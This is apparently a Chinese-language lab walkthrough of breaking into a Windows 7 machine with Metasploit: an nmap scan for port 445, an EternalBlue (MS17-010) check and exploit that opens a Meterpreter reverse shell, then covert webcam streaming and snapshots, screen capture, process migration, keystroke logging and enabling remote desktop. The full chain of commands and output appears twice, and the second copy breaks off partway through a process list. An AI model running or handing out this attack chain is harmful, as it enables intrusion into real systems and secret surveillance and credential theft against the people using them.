扫描端口
┌──(root💀kali)-[~/桌面]
└─# nmap -sS -p 445 -oG - 192.168.0.0/24 | grep open
Host: 192.168.0.18 (localhost) Ports: 445/open/tcp//microsoft-ds///
Host: 192.168.0.26 (localhost) Ports: 445/open/tcp//microsoft-ds///
Host: 192.168.0.44 (localhost) Ports: 445/open/tcp//microsoft-ds///
检测msf的数据库是否启动
┌──(root💀kali)-[~/桌面]
└─# msfdb status
● postgresql.service - PostgreSQL RDBMS
Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
Active: active (exited) since Fri 2021-05-07 19:19:46 CST; 3 months 6 days ago
Process: 2114 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
Main PID: 2114 (code=exited, status=0/SUCCESS)
CPU: 2ms
5月 07 19:19:46 kali systemd[1]: Starting PostgreSQL RDBMS...
5月 07 19:19:46 kali systemd[1]: Finished PostgreSQL RDBMS.
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
postgres 2096 postgres 5u IPv6 31630 0t0 TCP localhost:5432 (LISTEN)
postgres 2096 postgres 6u IPv4 31631 0t0 TCP localhost:5432 (LISTEN)
UID PID PPID C STIME TTY STAT TIME CMD
postgres 2096 1 0 12:43 ? Ss 0:01 /usr/lib/postgresql/13/bin/postgres -D /var/lib/postgresql/13/main -c config_file=/etc/postgresql/13/main/postgresql.conf
[+] Detected configuration file (/usr/share/metasploit-framework/config/database.yml)
启动msf
┌──(root💀kali)-[~/桌面]
└─# msfconsole
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
=[ metasploit v6.0.37-dev ]
+ -- --=[ 2111 exploits - 1136 auxiliary - 357 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services
msf6 >
找永恒之蓝工具
msf6 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
2 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
3 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
4 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/smb/smb_ms17_010
检测是否存在永恒之蓝漏洞
………………………………………………………………………………………………………………………………………………………………………………………………
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.0.44
rhost => 192.168.0.44
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.0.44:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.44:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
使用exploit利用漏洞
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.44
rhost => 192.168.0.44
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.0.130:4444
[*] 192.168.0.44:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.0.44:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.44:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.44:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.44:445 - The target is vulnerable.
[*] 192.168.0.44:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.44:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.44:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.0.44:445 - Connecting to target for exploitation.
[+] 192.168.0.44:445 - Connection established for exploitation.
[+] 192.168.0.44:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.44:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.0.44:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.0.44:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.0.44:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.0.44:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.44:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.44:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.44:445 - Starting non-paged pool grooming
[+] 192.168.0.44:445 - Sending SMBv2 buffers
[+] 192.168.0.44:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.44:445 - Sending final SMBv2 buffers.
[*] 192.168.0.44:445 - Sending last fragment of exploit packet!
[*] 192.168.0.44:445 - Receiving response from exploit packet
[+] 192.168.0.44:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.44:445 - Sending egg to corrupted connection.
[*] 192.168.0.44:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.0.44
[*] Meterpreter session 1 opened (192.168.0.130:4444 -> 192.168.0.44:49169) at 2021-08-13 20:12:50 +0800
[+] 192.168.0.44:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.44:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.44:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
摄像头设备利用
## 查看摄像头列表
meterpreter > webcam_list
1: Integrated Camera
meterpreter >
## 打开摄像头
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: /root/桌面/wdLIGCsG.html
[*] Streaming...
## 利用摄像头拍照
meterpreter >
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/桌面/OBFcneAz.jpeg
meterpreter >
捕捉屏幕截图
meterpreter > screensh
screenshare screenshot
meterpreter > screenshot
Screenshot saved to: /root/桌面/AntqirEf.jpeg
meterpreter >
实时监控桌面
meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /root/桌面/ijMyjxef.html
[*] Streaming...
^C[GFX1-]: Receive IPC close with reason=AbnormalShutdown
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
[-] Error running command screenshare: Interrupt
抓取键盘记录
## 查询当前进程号
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
168 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
300 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
468 372 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
524 372 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
532 516 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
580 972 dwm.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\Dwm.exe
584 524 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
592 524 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
600 524 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
700 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
760 584 ibmpmsvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\ibmpmsvc.exe
792 584 LPlatSvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\LPlatSvc.exe
800 584 PresentationFontCache.exe x64 0 NT AUTHORITY\LOCAL SERVICE
872 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
920 1144 igfxEM.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxEM.exe
936 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
972 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1000 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1028 1120 RAVBg64.exe x64 1 NT AUTHORITY\SYSTEM C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
1060 584 igfxCUIService.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\igfxCUIService.exe
1112 1144 igfxHK.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxHK.exe
1120 584 RtkAudioService64.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
1176 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1256 516 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
1368 1928 explorer.exe x64 1 yuanan-PC\yuanan C:\Windows\Explorer.EXE
1416 1144 igfxTray.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxTray.exe
1440 584 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1488 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1552 1440 PDMQlQpOYKl.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\PDMQlQpOYKl.exe
1720 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1904 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1936 1000 taskeng.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\taskeng.exe
2236 1440 nDjWCo.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\nDjWCo.exe
2284 584 wmpnetwk.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2288 792 LPlatSvc.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\LPlatSvc.exe
2296 584 taskhost.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\taskhost.exe
2532 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2568 584 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2608 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2672 584 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
3100 1936 RAVBg64.exe x64 1 yuanan-PC\yuanan C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
3164 3112 RAVCpl64.exe x64 1 yuanan-PC\yuanan C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
3500 1440 HPGNJDtrnf.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\HPGNJDtrnf.exe
## 打开记事本之后再次查看当前进程号
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
168 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
300 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
468 372 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
524 372 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
532 516 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
580 972 dwm.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\Dwm.exe
584 524 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
592 524 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
600 524 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
700 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
760 584 ibmpmsvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\ibmpmsvc.exe
792 584 LPlatSvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\LPlatSvc.exe
800 584 PresentationFontCache.exe x64 0 NT AUTHORITY\LOCAL SERVICE
872 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
920 1144 igfxEM.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxEM.exe
936 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
972 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1000 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1028 1120 RAVBg64.exe x64 1 NT AUTHORITY\SYSTEM C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
1060 584 igfxCUIService.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\igfxCUIService.exe
1112 1144 igfxHK.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxHK.exe
1120 584 RtkAudioService64.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
1176 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1256 516 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
1368 1928 explorer.exe x64 1 yuanan-PC\yuanan C:\Windows\Explorer.EXE
1416 1144 igfxTray.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxTray.exe
1440 584 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1488 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1552 1440 PDMQlQpOYKl.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\PDMQlQpOYKl.exe
1720 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1904 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1936 1000 taskeng.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\taskeng.exe
2236 1440 nDjWCo.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\nDjWCo.exe
2256 1368 notepad.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\NOTEPAD.EXE
2284 584 wmpnetwk.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2288 792 LPlatSvc.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\LPlatSvc.exe
2296 584 taskhost.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\taskhost.exe
2400 2672 SearchFilterHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchFilterHost.exe
2532 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2568 584 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2608 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2672 584 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
3100 1936 RAVBg64.exe x64 1 yuanan-PC\yuanan C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
3164 3112 RAVCpl64.exe x64 1 yuanan-PC\yuanan C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
3500 1440 HPGNJDtrnf.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\HPGNJDtrnf.exe
4052 2672 SearchProtocolHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchProtocolHost.exe
## 转移至记事本的进程号
meterpreter > migrate 2256
[*] Migrating from 1440 to 2256...
[*] Migration completed successfully.
meterpreter >
meterpreter > key
keyboard_send keyevent keyscan_dump keyscan_start keyscan_stop
## 开启键盘抓取
meterpreter > keyscan_start
Starting the keystroke sniffer ...
## dump键盘操作记录
meterpreter > keyscan_dump
Dumping captured keystrokes...
jhgjhgjhghjgjhllll<CR>
<CR>
<CR>
<CR>
1dsds<CR>
## 结束键盘抓取
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter >
启远程桌面
run post/windows/manage/enable_rdp
扫描端口
┌──(root💀kali)-[~/桌面]
└─# nmap -sS -p 445 -oG - 192.168.0.0/24 | grep open
Host: 192.168.0.18 (localhost) Ports: 445/open/tcp//microsoft-ds///
Host: 192.168.0.26 (localhost) Ports: 445/open/tcp//microsoft-ds///
Host: 192.168.0.44 (localhost) Ports: 445/open/tcp//microsoft-ds///
检测msf的数据库是否启动
┌──(root💀kali)-[~/桌面]
└─# msfdb status
● postgresql.service - PostgreSQL RDBMS
Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
Active: active (exited) since Fri 2021-05-07 19:19:46 CST; 3 months 6 days ago
Process: 2114 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
Main PID: 2114 (code=exited, status=0/SUCCESS)
CPU: 2ms
5月 07 19:19:46 kali systemd[1]: Starting PostgreSQL RDBMS...
5月 07 19:19:46 kali systemd[1]: Finished PostgreSQL RDBMS.
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
postgres 2096 postgres 5u IPv6 31630 0t0 TCP localhost:5432 (LISTEN)
postgres 2096 postgres 6u IPv4 31631 0t0 TCP localhost:5432 (LISTEN)
UID PID PPID C STIME TTY STAT TIME CMD
postgres 2096 1 0 12:43 ? Ss 0:01 /usr/lib/postgresql/13/bin/postgres -D /var/lib/postgresql/13/main -c config_file=/etc/postgresql/13/main/postgresql.conf
[+] Detected configuration file (/usr/share/metasploit-framework/config/database.yml)
启动msf
┌──(root💀kali)-[~/桌面]
└─# msfconsole
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
=[ metasploit v6.0.37-dev ]
+ -- --=[ 2111 exploits - 1136 auxiliary - 357 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services
msf6 >
找永恒之蓝工具
msf6 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
2 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
3 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
4 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/smb/smb_ms17_010
检测是否存在永恒之蓝漏洞
………………………………………………………………………………………………………………………………………………………………………………………………
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.0.44
rhost => 192.168.0.44
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.0.44:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.44:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
使用exploit利用漏洞
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.44
rhost => 192.168.0.44
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.0.130:4444
[*] 192.168.0.44:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.0.44:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.44:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.44:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.44:445 - The target is vulnerable.
[*] 192.168.0.44:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.44:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.44:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.0.44:445 - Connecting to target for exploitation.
[+] 192.168.0.44:445 - Connection established for exploitation.
[+] 192.168.0.44:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.44:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.0.44:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.0.44:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.0.44:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.0.44:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.44:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.44:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.44:445 - Starting non-paged pool grooming
[+] 192.168.0.44:445 - Sending SMBv2 buffers
[+] 192.168.0.44:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.44:445 - Sending final SMBv2 buffers.
[*] 192.168.0.44:445 - Sending last fragment of exploit packet!
[*] 192.168.0.44:445 - Receiving response from exploit packet
[+] 192.168.0.44:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.44:445 - Sending egg to corrupted connection.
[*] 192.168.0.44:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.0.44
[*] Meterpreter session 1 opened (192.168.0.130:4444 -> 192.168.0.44:49169) at 2021-08-13 20:12:50 +0800
[+] 192.168.0.44:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.44:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.44:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
摄像头设备利用
## 查看摄像头列表
meterpreter > webcam_list
1: Integrated Camera
meterpreter >
## 打开摄像头
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: /root/桌面/wdLIGCsG.html
[*] Streaming...
## 利用摄像头拍照
meterpreter >
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/桌面/OBFcneAz.jpeg
meterpreter >
捕捉屏幕截图
meterpreter > screensh
screenshare screenshot
meterpreter > screenshot
Screenshot saved to: /root/桌面/AntqirEf.jpeg
meterpreter >
实时监控桌面
meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /root/桌面/ijMyjxef.html
[*] Streaming...
^C[GFX1-]: Receive IPC close with reason=AbnormalShutdown
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
[-] Error running command screenshare: Interrupt
抓取键盘记录
## 查询当前进程号
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
168 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
300 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
468 372 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
524 372 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
532 516 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
580 972 dwm.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\Dwm.exe
584 524 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
592 524 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
600 524 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
700 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
760 584 ibmpmsvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\ibmpmsvc.exe
792 584 LPlatSvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\LPlatSvc.exe
800 584 PresentationFontCache.exe x64 0 NT AUTHORITY\LOCAL SERVICE
872 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
920 1144 igfxEM.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxEM.exe
936 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
972 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1000 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1028 1120 RAVBg64.exe x64 1 NT AUTHORITY\SYSTEM C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
1060 584 igfxCUIService.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\igfxCUIService.exe
1112 1144 igfxHK.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxHK.exe
1120 584 RtkAudioService64.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
1176 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1256 516 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
1368 1928 explorer.exe x64 1 yuanan-PC\yuanan C:\Windows\Explorer.EXE
1416 1144 igfxTray.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxTray.exe
1440 584 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1488 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1552 1440 PDMQlQpOYKl.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\PDMQlQpOYKl.exe
1720 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1904 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1936 1000 taskeng.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\taskeng.exe
2236 1440 nDjWCo.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\nDjWCo.exe
2284 584 wmpnetwk.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2288 792 LPlatSvc.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\LPlatSvc.exe
2296 584 taskhost.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\taskhost.exe
2532 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2568 584 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2608 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2672 584 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
3100 1936 RAVBg64.exe x64 1 yuanan-PC\yuanan C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
3164 3112 RAVCpl64.exe x64 1 yuanan-PC\yuanan C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
3500 1440 HPGNJDtrnf.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\HPGNJDtrnf.exe
## 打开记事本之后再次查看当前进程号
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
168 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
300 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
468 372 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
524 372 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
